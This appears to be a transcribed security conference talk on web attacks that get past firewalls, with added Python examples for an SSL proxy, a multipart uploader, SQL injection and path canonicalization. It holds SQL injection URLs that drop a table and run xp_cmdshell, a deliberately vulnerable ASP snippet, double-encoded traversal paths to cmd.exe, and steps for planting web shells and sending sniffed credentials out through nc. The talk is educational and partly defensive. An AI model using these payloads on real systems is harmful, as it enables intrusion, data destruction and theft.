![Page 1: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/1.jpg)
One-Way Hacking: Futility of Firewalls in Web Hacking
JD Glaser, Saumil Shah, Foundstone Inc.
Typical Web Application set-up
[Diagram: the web client sends an HTTP request (cleartext or SSL) through a firewall to the web server (Apache, IIS, Netscape, etc.); the server hosts web apps through plugins (Perl, C/C++, JSP, etc.) which reach SQL databases over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, Javascript, VBscript, etc.]
Traditional Hacking…Limitations
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.
Utility of Firewalls
[Diagram: firewall in front of the web server, web apps and back-end DBs; attacks on OS network services such as Sun RPC, NT ipc$ and wu-ftpd are stopped at the firewall.]
• Hacks on OS network services prevented by firewalls.
Utility of Firewalls
[Diagram: direct connections from the outside to the back-end web apps and DBs are blocked (X).]
• Internal back-end application servers are on a non-routable IP network (private addresses).
Utility of Firewalls
[Diagram: outbound connections originating from the web server are blocked (X).]
• Outbound access restricted. Why would a web server telnet out?
Futility of Firewalls
• E-commerce / Web hacking is unfettered.
• Web traffic is the most commonly allowed of protocols through Internet firewalls.
• Why fight the wall when you've got an open door?
• HTTP is perceived as "friendly" traffic.
• Content/Application based attacks are still perceived as rare.
The Web Hacker's Toolbox
Essentially, all a web hacker needs is …
• a web browser,
• an Internet connection,
• … and a clear mind.
Firewalls cannot prevent…
[Diagram: web client to web server; weak spot: web server mis-configuration.]
• URL Interpretation Attacks.
Firewalls cannot prevent…
[Diagram: web client to web server and web apps; weak spots: URL Interpretation attacks (web server), poor checking of user inputs (web apps).]
• Input Validation attacks.
Firewalls cannot prevent…
[Diagram: web client to web server, web apps and DBs; weak spots: URL Interpretation attacks (web server), Input Validation attacks (web apps), extended SQL statements (DB).]
• SQL Query Poisoning
Firewalls cannot prevent…
[Diagram: web client to web server, web apps and DBs; weak spots: URL Interpretation attacks (web server), Input Validation attacks (web apps), SQL query poisoning (DB), and reverse-engineering of HTTP cookies between client and server.]
• HTTP session hijacking.
• Impersonation.
The URL as a cruise missile
[Diagram: the URL below, broken into its components, each aimed at a different layer: web server, web apps, back-end DBs.]
http: // 10.0.0.1 / catalogue / display.asp ? pg = 1 & product = 7
(spaced out to show scheme, host, path, script and parameters; as sent it is http://10.0.0.1/catalogue/display.asp?pg=1&product=7)
Web Hacks - net effects
Web hacks produce net effects of the following types:
• Extra information disclosure (paths, etc.).
• Source code and arbitrary file content disclosure.
• Extra data disclosure (e.g. return all rows).
• Arbitrary command execution.
The Web Hacker's Toolbox
Some desired accessories would be …
• a port scanner,
• netcat,
• vulnerability checker (e.g. whisker),
• OpenSSL, … etc.
Hacking over SSL
• Some SSL Myths:
  • "We are secure because we use SSL!"
  • "Strong 128 bit crypto being used"
  • "We use Digital Certificates signed by VeriSign"
Hacking over SSL
• Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
[Diagram: web client → nc (listening on port 80) → openssl (SSL client) → SSL web server on port 443.]
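The nc + openssl proxy the slide describes, rewritten in Python as an added example (this is not code from the talk or from Foundstone): `serve()` listens on a local plaintext port, opens a TLS session to the target's port 443 for every client and relays bytes both ways with `pump()`; `loopback()` drives the same relay over two socket pairs so the logic can be exercised offline. The listen port, target host, `--insecure` flag and file name `sslproxy.py` are assumptions for the demo.

```python
"""Plaintext-to-TLS proxy in the spirit of the nc + openssl trick (added example).
Assumed: the caller supplies the listen port, target host and whether to verify its cert."""
import selectors
import socket
import ssl
import sys
import threading


def pump(a, b):
    """Relay bytes a<->b until both directions have seen EOF.
    Returns (bytes relayed a->b, bytes relayed b->a). Works for plain or TLS sockets."""
    sel = selectors.DefaultSelector()
    sel.register(a, selectors.EVENT_READ, data=b)
    sel.register(b, selectors.EVENT_READ, data=a)
    relayed = {a: 0, b: 0}
    live = 2
    while live:
        for key, _ in sel.select():
            src, dst = key.fileobj, key.data
            chunk = src.recv(65536)
            if not chunk:                      # src hit EOF: pass the half-close on to dst
                sel.unregister(src)
                try:
                    dst.shutdown(socket.SHUT_WR)
                except OSError:
                    pass
                live -= 1
                continue
            dst.sendall(chunk)
            relayed[src] += len(chunk)
            # a TLS record may have left decrypted bytes buffered that select() cannot see
            while isinstance(src, ssl.SSLSocket) and src.pending():
                chunk = src.recv(65536)
                dst.sendall(chunk)
                relayed[src] += len(chunk)
    sel.close()
    return relayed[a], relayed[b]


def _relay_and_close(a, b):
    try:
        pump(a, b)
    finally:
        a.close()
        b.close()


def serve(listen_port, remote_host, remote_port=443, verify=True):
    """Accept plaintext on 127.0.0.1:listen_port; for each client open a TLS session
    to remote_host:remote_port and relay. verify=False mirrors openssl s_client's
    habit of not caring who the server is (fine when the target is your own test box)."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with socket.create_server(("127.0.0.1", listen_port)) as listener:
        while True:
            client, _ = listener.accept()
            upstream = ctx.wrap_socket(socket.create_connection((remote_host, remote_port)),
                                       server_hostname=remote_host)
            threading.Thread(target=_relay_and_close, args=(client, upstream), daemon=True).start()


def recv_all(sock):
    """Read until EOF."""
    buf = b""
    while chunk := sock.recv(65536):
        buf += chunk
    return buf


def loopback(request, response):
    """Drive pump() over two socketpairs, no network and no TLS: the 'client' sends
    request and half-closes, the 'server' answers with response and closes.
    Returns (bytes the server saw, bytes the client saw, pump()'s byte counters)."""
    client, proxy_in = socket.socketpair()
    proxy_out, server = socket.socketpair()
    counts = {}
    t = threading.Thread(target=lambda: counts.update(v=pump(proxy_in, proxy_out)))
    t.start()
    client.sendall(request)
    client.shutdown(socket.SHUT_WR)
    seen_by_server = recv_all(server)
    server.sendall(response)
    server.close()
    seen_by_client = recv_all(client)
    client.close()
    t.join(5)
    proxy_in.close()
    proxy_out.close()
    return seen_by_server, seen_by_client, counts.get("v")


if __name__ == "__main__":
    # python sslproxy.py 8080 www.example.com [--insecure]   then browse to http://127.0.0.1:8080/
    serve(int(sys.argv[1]), sys.argv[2], verify="--insecure" not in sys.argv)
```

Like the nc + openssl pair, this relays whatever the client sends unchanged, so the Host header is whatever your browser or netcat put in it; for a name-based virtual host, craft the request by hand. Everything between you and the proxy is cleartext, which is the point: any tool that speaks plain HTTP now works against the SSL site.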
Use the Source, Luke
• Source code disclosure may reveal any flaws in the application design.
• Can be used to retrieve application configuration files.
• e.g. global.asa, etc.
Source Code Disclosure
• WebLogic / Tomcat example:
Source code disclosure
• IIS +.htr example:
SQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• For example (ASP/VBScript; the ID query-string value is concatenated straight into the query text):

    Dim objCon, objRS, sql_qry
    ' Connecting as sa: anything injected into the query runs with sysadmin rights
    Const CONNECT_STRING = "Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;PWD=xyzzy"
    ' User input goes into the SQL text unchecked
    sql_qry = "SELECT * FROM PRODUCT WHERE ID = " & Request.QueryString("ID")
    Set objCon = Server.CreateObject("ADODB.Connection")
    objCon.Open CONNECT_STRING
    Set objRS = objCon.Execute(sql_qry)
SQL Query Poisoning
• Return all rows:
http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
SQL Query Poisoning
• Drop Table:
http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query (%01 decodes to a single 0x01 byte sitting between the two statements):
SELECT * FROM PRODUCT WHERE ID=3<0x01>DROP TABLE PRODUCT
SQL Query Poisoning
• Remote Command Execution!
http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+'copy+\winnt\system32\cmd.exe+\inetpub\scripts'
• Command executed:
copy \winnt\system32\cmd.exe \inetpub\scripts
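The same lookup as the ASP page, reproduced against an in-memory SQLite database as an added example (not code from the talk): `lookup_vulnerable` glues the query-string value into the SQL text exactly as the ASP does, `lookup_parameterized` binds it as a value, and `lookup_validated` refuses anything that is not an integer before it reaches the database. The PRODUCT rows are constructed for the demo.

```python
"""SQL query poisoning: concatenation vs. binding, reproduced against SQLite (added example)."""
import sqlite3

# Constructed demo rows standing in for the PRODUCT table on the slide.
PRODUCTS = [(1, "widget", 9.99), (2, "gadget", 19.99), (3, "gizmo", 4.50)]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT, PRICE REAL)")
    con.executemany("INSERT INTO PRODUCT VALUES (?, ?, ?)", PRODUCTS)
    return con


def lookup_vulnerable(con, user_id: str) -> list:
    """Same construction as the ASP page: the query-string value becomes part of the SQL text,
    so '3 OR 1=1' turns the WHERE clause into a tautology."""
    sql = "SELECT * FROM PRODUCT WHERE ID = " + user_id
    return con.execute(sql).fetchall()


def lookup_parameterized(con, user_id: str) -> list:
    """Bind the value instead. The driver hands it to the engine separately from the
    statement, so '3 OR 1=1' is compared with ID as one opaque string and matches nothing."""
    return con.execute("SELECT * FROM PRODUCT WHERE ID = ?", (user_id,)).fetchall()


def lookup_validated(con, user_id: str) -> list:
    """Belt and braces: an ID is an integer, so anything else is refused up front (ValueError)."""
    return lookup_parameterized(con, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "3"))            # the row the page intended
    print(lookup_vulnerable(db, "3 OR 1=1"))     # every row: the slide's ?ID=3+OR+1=1
    print(lookup_parameterized(db, "3 OR 1=1"))  # []
```

The stacked `DROP TABLE` and `xp_cmdshell` payloads from the slides do not reproduce here because SQLite's `execute()` refuses more than one statement per call (it raises rather than runs the second statement), whereas the ADO path on the slide hands the whole string to SQL Server as a batch. Binding the parameter closes both variants at once, since no part of the user's string is ever parsed as SQL.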
One-way attacks
• Assume the tightest firewall configuration.
• All legal HTTP requests.
• No outbound traffic from internal network.
• …yet, total control.
• Illustrates how the smallest of openings can be big enough to drive a truck through it!
One-way attacks … entry point
• One entry point required.
• Arbitrary command execution.
• Can be achieved in many ways:
  • Known vulnerability (e.g. IIS Unicode / double decode)
  • Buffer overflow (sometimes kills server!)
  • Fooling the application itself! (metacharacters, SQL query poisoning)
One-way attacks … uploader
• Create an HTTP multipart-MIME upload mechanism.
• The same process as sending attachments over web-based mail (yahoo, hotmail).
• Uploader allows the attacker to plant and execute tools on the server.
• The hole widens.
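An HTTP multipart/form-data uploader of the kind the slide describes, added here as an example (not the talk's own tool): `build_multipart` produces the body and Content-Type a browser sends from a file-upload form, `parse_multipart` is the receiving side that splits it back into fields and files (the upload page planted on the target would write each file payload to disk), and `post` ships the request with urllib. Field names, file name, URL and the sample bytes are constructed for the demo.

```python
"""HTTP multipart/form-data upload, both ends (added example; all names are demo values)."""
import urllib.request
import uuid
from email.parser import BytesParser
from email.policy import HTTP


def build_multipart(fields: dict, files: dict) -> tuple[str, bytes]:
    """Encode text fields {name: value} and files {name: (filename, bytes)} the way a
    browser submits an <input type=file> form. Returns (Content-Type header value, body)."""
    boundary = "----" + uuid.uuid4().hex           # must not occur inside any part
    parts = []
    for name, value in fields.items():
        head = f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'
        parts.append(head.encode() + value.encode() + b"\r\n")
    for name, (filename, data) in files.items():
        head = (f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
                f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n')
        parts.append(head.encode() + data + b"\r\n")   # raw bytes, no transfer encoding
    body = b"".join(parts) + f"--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", body


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Receiving side: split the body back into {name: (filename or None, bytes)}.
    The stdlib MIME parser handles the boundaries; the CRLF before each boundary
    belongs to the boundary, so the file bytes come back exactly as sent."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser(policy=HTTP).parsebytes(raw)
    out = {}
    for part in msg.iter_parts():
        disposition = part["Content-Disposition"]
        name = disposition.params.get("name")
        filename = disposition.params.get("filename")
        out[name] = (filename, part.get_payload(decode=True))
    return out


def post(url: str, content_type: str, body: bytes) -> bytes:
    """Send the upload as an ordinary POST: one request, all inside HTTP, nothing outbound needed."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req) as resp:
        return resp.read()


if __name__ == "__main__":
    # Demo values: the tool to plant and where the server-side page should drop it.
    ctype, payload = build_multipart({"dir": "/inetpub/scripts"},
                                     {"file": ("nc.exe", b"MZ\x90\x00\xff\r\n\x00tail")})
    for name, (fname, data) in parse_multipart(ctype, payload).items():
        print(name, fname, len(data))
```

On the server side the page that pairs with this is a few lines in ASP, PHP or Perl that read the posted part and write it under the supplied directory; from then on every further tool reaches the box as a file upload over port 80, which is why the slide says the hole widens.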
One-way attacks … remote prompt
• Install a remote web-based command prompt.
• HTML form, passes inputs to the command-shell on the server.
• Semi-interactive.
One-way attacks … SQL prompts!
• A step further, install a SQL query prompt page!
• Allows attackers to arbitrarily pick and attack back-end SQL servers.
• Web programming languages such as ASP, PHP allow back-end database interfaces.
• Pilfering of database credentials from source code disclosure attacks would be useful!
One-way attacks … getting root!
• Upload your favourite privilege escalation $pl01t!
• Run it through the web-based command prompt.
• Get admin/root privileges!
One-way attacks … going further
• Drive through the back-end network.
• Portscanning
• Service enumeration
• Network packet sniffing
• Recovering passwords / credentials
• … it's all open now!
WinDump
• Loads dynamically – don't have to reboot box.
• Works great with MDAC, Unicode, etc…
• Sniff internal networks after attack.
• Grep for user/pass – pipe output.
• Send results back through nc.
• Send results back through firewall as an HTML page – ultra cool because it bypasses firewall.
Root Causes of Web Hacks
• Complex web architectures may cause oversight in web server configuration.
• URL Parsing.
• File Canonicalization.
• Combination of underlying operating system and web server may leave holes.
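How the URL parsing / file canonicalization root cause plays out, as an added example (not from the talk): a filter that inspects the request path as received misses a traversal hidden behind double URL-encoding (`%255c` decodes to `%5c` and then to a backslash), whereas a filter that canonicalizes first decides on the same path the file system will see. The `/scripts/` web-root prefix and the sample paths are assumptions for the demo.

```python
"""Why 'check the raw URL' fails: traversal hidden by encoding (added example)."""
import posixpath
from urllib.parse import unquote


def naive_is_safe(raw_path: str) -> bool:
    """The kind of check that looks at the request path as it arrived.
    It only notices a traversal that is spelled out literally."""
    return "../" not in raw_path and "..\\" not in raw_path


def canonical(raw_path: str, max_rounds: int = 3) -> str:
    """Bring a request path into the form the file system will see: percent-decode
    until the string stops changing (this is what catches double encoding), treat
    backslash as a separator, and collapse '.' and '..' segments."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)     # bytes that are not valid UTF-8 (e.g. %c0%af) become U+FFFD
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    return posixpath.normpath("/" + path.lstrip("/"))


def is_safe(raw_path: str, webroot: str = "/scripts/") -> bool:
    """Decide on the canonical form, not on the bytes that arrived."""
    c = canonical(raw_path)
    if "\ufffd" in c:   # an encoding this decoder cannot interpret: refuse rather than guess
        return False
    return c.startswith(webroot)


if __name__ == "__main__":
    for p in ("/scripts/upload.asp",
              "/scripts/../winnt/system32/cmd.exe",
              "/scripts/..%255c..%255cwinnt/system32/cmd.exe"):
        print(f"{p:50} naive={naive_is_safe(p)!s:5} canonical={canonical(p)} safe={is_safe(p)}")
```

The overlong-UTF-8 form (`%c0%af`) that the IIS Unicode bug relied on is the same lesson from the other side: the filter and the file system layer must decode with the same rules, and when the filter cannot make sense of an encoding it should fail closed, as `is_safe` does, rather than pass the request through unchanged.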
Root Causes of Web Hacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero knowledge administration breeds zero knowledge administrators.
Web Security Measures
• Heighten security awareness amongst administrators, developers and most important - TOP MANAGEMENT!
• Firewalls and SSL do not solve all security problems.
• Keep abreast of latest vendor advisories and patches.
• Monitor security mailing lists such as BugTraq. :-/